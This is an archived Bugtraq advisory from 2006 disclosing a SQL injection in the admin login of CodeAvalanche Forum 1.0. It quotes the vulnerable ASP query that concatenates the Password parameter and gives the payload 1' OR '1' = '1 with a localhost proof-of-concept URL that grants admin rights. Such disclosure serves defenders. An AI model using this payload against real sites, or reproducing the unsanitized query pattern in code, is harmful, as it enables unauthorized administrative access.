NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2006-05

CA Forum Remote SQL Injection

omnipresentemail.it
Date: Thu Jun 01 2006 - 12:09:10 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

------------------------------------------------------------------
- CAForum 1.0 Remote SQL Injection -
-= http://colander.altervista.org/advisory/CAForum.txt =-
------------------------------------------------------------------

-= CodeAvalanche Forum Version 1.0 =-

Omnipresent
june 01, 2006

Vunerability(s):
----------------
SQL Injection

Product:
--------
CodeAvalanche Forum Version 1.0

Vendor:
--------
http://www.truecontent.info/codeavalanche/asp-forum-script.php

Description of product:
-----------------------

CodeAvalanche FreeForum is asp forum application which allows free posting, there is no needs for registration of your
visitors. Administrator can add unlimited number of forum categories.

Vulnerability / Exploit:
------------------------

In the file default.asp in Admin directory is vulnerable to an Remote SQL Injection Attack.
A malicious people can gain Admin rights by putting rights parameters in the Password Variable.

Let's Check the source code:

<% Response.Buffer = True

userLogged=false
If Request("Password")<>"" Then
'response.Write(Request("Password"))
'response.flush

dim rsUser,selectSQL
selectSQL="SELECT * FROM PARAMS where PASSWORD='" & Request("Password") & "'"

[...]

[End default.asp]

As you can see the variable Password is not properly sanitized before be used, so an attacker can put this string in the
password field:

1' OR '1' = '1

So, the query will be:

selectSQL="SELECT * FROM PARAMS where PASSWORD='1' OR '1' = '1'

And you can gain access to the application with admin rights.

PoC / Proof of Concept of SQL Injection:
----------------------------------------

This is a simple Proof Of Concept used on my local machine:

http://127.0.0.1/[Application_Path]/[CAForum]/admin/default.asp?password=1'%20OR%20'1'%20=%20'1

Vendor Status
-------------

Not informed!

Credits:
--------
omnipresent
omnipresentemail.it

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]